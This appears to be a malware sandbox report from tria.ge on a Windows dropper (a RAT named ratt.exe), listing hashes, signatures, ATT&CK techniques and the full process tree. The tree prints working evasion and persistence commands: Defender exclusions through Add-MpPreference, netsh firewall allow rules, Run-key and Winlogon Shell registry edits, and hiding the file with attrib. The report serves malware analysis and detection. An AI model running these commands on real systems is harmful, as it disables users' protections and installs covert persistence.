Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
101s -
max time network
108s -
platform
windows10-1703_x64 -
resource
win10-20230703-en -
resource tags
-
submitted
27/08/2023, 03:51
General
-
Target
2c9c37a8e2be5e00a653e1dd413bc69aa44cf3d57cb0b087cd2699cdc284b784.exe
-
Size
1.4MB
-
MD5
1ee2b4b21799345d40efe53cb656df51
-
SHA1
0dd94699e4272f66401437fbc5392ec1b41b9446
-
SHA256
2c9c37a8e2be5e00a653e1dd413bc69aa44cf3d57cb0b087cd2699cdc284b784
-
SHA512
0e20c4bf795f61f3aab1364dd729011e9d2108c2bbb01809e61fdcb43a528134747583ddb0b9b6a7bc1663464501338b567a9c27deb455408c869feafdb6838c
-
SSDEEP
24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk
Malware Config
Signatures
-
Modifies Windows Firewall 1 TTPs 2 IoCs
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 1 IoCs
-
UPX packed file 7 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 34 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2c9c37a8e2be5e00a653e1dd413bc69aa44cf3d57cb0b087cd2699cdc284b784.exe"C:\Users\Admin\AppData\Local\Temp\2c9c37a8e2be5e00a653e1dd413bc69aa44cf3d57cb0b087cd2699cdc284b784.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\nslookup.exenslookup myip.opendns.com. resolver1.opendns.com4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic ComputerSystem get Domain4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\7z.exe7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes4⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes4⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic computersystem where name="YKYQUOIZ" set AutomaticManagedPagefile=False5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=200005⤵
-
-
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 96⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 18 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 18 > nul && "C:\Users\Admin\Music\rot.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 186⤵
- Runs ping.exe
-
-
-
-
C:\Windows\SysWOW64\attrib.exe"C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F3⤵
- Adds Run key to start application
-
-
C:\Users\Admin\AppData\Local\Temp\ratt.exe"ratt.exe"3⤵
- Executes dropped EXE
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
480.3MB
MD50278b03c39e8c3c7e5e825a7cd194626
SHA1674d214c9d85ae7eab910c460205e523ed43324b
SHA256f03dd81014776060d80578ca98755279f8f46199adaf8ea039ac2a55a5027441
SHA51200747789458217a39affd989da1f6acf8d648014c92be994f13da431d734b9387a981ba34f4cb524c3961b08f571e831af837708af93e5096ba225450201e360
-
Filesize
321.7MB
MD593c863c69a3c203800280368920824e0
SHA12feef2fd79c975f594f6fc918be898c881067f51
SHA256ed26de54acab6546680aefca47dc61646aefacca28eaa61370b27e05eef8c949
SHA512600b0fd1ee2174bba1b426711eccbb9516b35bab3a8156c873d78e951a57474f4226860f5de444bf691d13216ea7ca31dcb60a5710b6ca445ae3971a7fbdc19f
-
Filesize
1KB
MD50f5cbdca905beb13bebdcf43fb0716bd
SHA19e136131389fde83297267faf6c651d420671b3f
SHA256a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060
SHA512a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0
-
Filesize
12KB
MD529d7f46b73ab917e024f569fed7b8b10
SHA1e1f5cf963419a6850950f3b3e7b159170ac8d261
SHA2563076607bbf2295242402c41f412d10e0bc13891526d4e0c5ee8581e8b66d8350
SHA512e4d772d7dfdde387755bcd69748548569e81ae1513601f3cb3487b6c60ef09a0df3050836120c8bf61756b70b2346f6f7afa2e86d909299ef2e240fa0410dedf
-
Filesize
12KB
MD580be856fc55fea8e84c014ab00a2ca74
SHA1f35b0692b3b47c863a011048654759e83448c736
SHA256eb5e9e8b7eec9a72ae34eda8e65d6c47b1896f222efaa32bfa27fdd9bb66c830
SHA512be6cb0637c4039a98837c5814fd1a29fb42b3f567368e400c09ea234fa6c213aecf4d57cefba7a0290a7b2c53b4a6007342eb011e621f09314376bb1c1409ffe
-
Filesize
12KB
MD543f7863a0c368dd4d12d00e9319a3109
SHA14044a503b59bc8ece070e17d622b176a05735fa0
SHA2564640e28448d3fb73dfb2a03d9868bbd1c37684950df745bf7a9ef6d22b4842c7
SHA5126f8b651987e78cc90b6b4ee74b8c2427c2d45b2a2d59553d3f2f107fb61d561f7417f13fe82028186b711ebc3c967dac22aaeae61ea7ade9887da83d0ca9bfbb
-
Filesize
12KB
MD5b6ed6578260efac7fc0e763907630e7c
SHA12f83cc73742cbc6e5f4723f9868b7d2d255730e2
SHA2567669db755c4fd17624371e8e3ce3429042fb43aa51e2b53589b3ea0916044328
SHA51256b173f1a751d7af848de9aa98719e35275645a0812607cd5fb517981e9449910676f2edbd78e8e4f929aee3fa8bc69749dd0d7a50bd207d148caae994082a2e
-
Filesize
12KB
MD5f7c38a86aab7490747ac174a02d3548a
SHA11a60b464a6b73a34565791e64659449223fa06f6
SHA25660ac3b14f795643fbe0cc76fedc99d58546120b6ce2aefafaf7508da5aa1527c
SHA512ac4383d05f222b9f9f23e77671be73aba6a45730d04d5968ad19aa0008aca3837cb81ae31f583cd94ff3b9181aa60f50301edc473cdd78c266871a8191ce6d60
-
Filesize
328KB
MD515bbbe562f9be3e5dcbb834e635cc231
SHA17c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a
SHA256ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde
SHA512769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287
-
Filesize
71KB
MD58ba2e41b330ae9356e62eb63514cf82e
SHA18dc266467a5a0d587ed0181d4344581ef4ff30b2
SHA256ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea
SHA5122fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d
-
Filesize
71KB
MD58ba2e41b330ae9356e62eb63514cf82e
SHA18dc266467a5a0d587ed0181d4344581ef4ff30b2
SHA256ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea
SHA5122fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d
-
Filesize
1KB
MD50df43097e0f0acd04d9e17fb43d618b9
SHA169b3ade12cb228393a93624e65f41604a17c83b6
SHA256c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873
SHA51201ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
693KB
MD57de6fdf3629c73bf0c29a96fa23ae055
SHA1dcb37f6d43977601c6460b17387a89b9e4c0609a
SHA256069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff
SHA512d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8
-
Filesize
1KB
MD57ea1fec84d76294d9256ae3dca7676b2
SHA11e335451d1cbb6951bc77bf75430f4d983491342
SHA2569a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940
SHA512ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317
-
Filesize
745.1MB
MD5be788bb3680cf3809d9678ee6f7ba321
SHA1499f01d5f654f83e172004dcc03f99abdd251734
SHA25603a17a2b669f72df082569ea477977d824796da3b6b7a8d0e6f91f2629ef406b
SHA51283c0b885740a57b84b2c909d0d6bb25baaa49d62499773030b59058325f37a5fcf39a1cd59ef9c229ca7289af7250034f6652e449625b67c2d260b285ddb9a8e
-
Filesize
278.0MB
MD5b025ae549fcb2f35b94070443503b6aa
SHA121aa8fa33f264eae649fcb7ec8602eafa14d5f71
SHA2566d02659a1a5c0776ef8cce779fe5a2cae5c698f723e36d4f5c1669954cf91fce
SHA512f27b33b28cccbab3a1d27227ea1381456c9f10f48441f93da80200e34750cc13820e4cfe04259d87717614efa06c4c55962f4479f75d2fc9b86a3093a74e7226
-
Filesize
328KB
MD515bbbe562f9be3e5dcbb834e635cc231
SHA17c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a
SHA256ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde
SHA512769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287
-
Filesize
112KB
-
Filesize
136KB
-
Filesize
216KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.2MB
-
Filesize
408KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
472KB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
3.3MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
584KB
-
Filesize
624KB
-
Filesize
1.7MB
-
Filesize
6.9MB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
5.0MB
-
Filesize
136KB
-
Filesize
104KB
-
Filesize
6.9MB
-
Filesize
3.3MB
-
Filesize
32KB
-
Filesize
300KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
204KB
-
Filesize
120KB
-
Filesize
660KB
-
Filesize
64KB
-
Filesize
592KB
-
Filesize
64KB
-
Filesize
904KB
-
Filesize
200KB
-
Filesize
200KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
6.9MB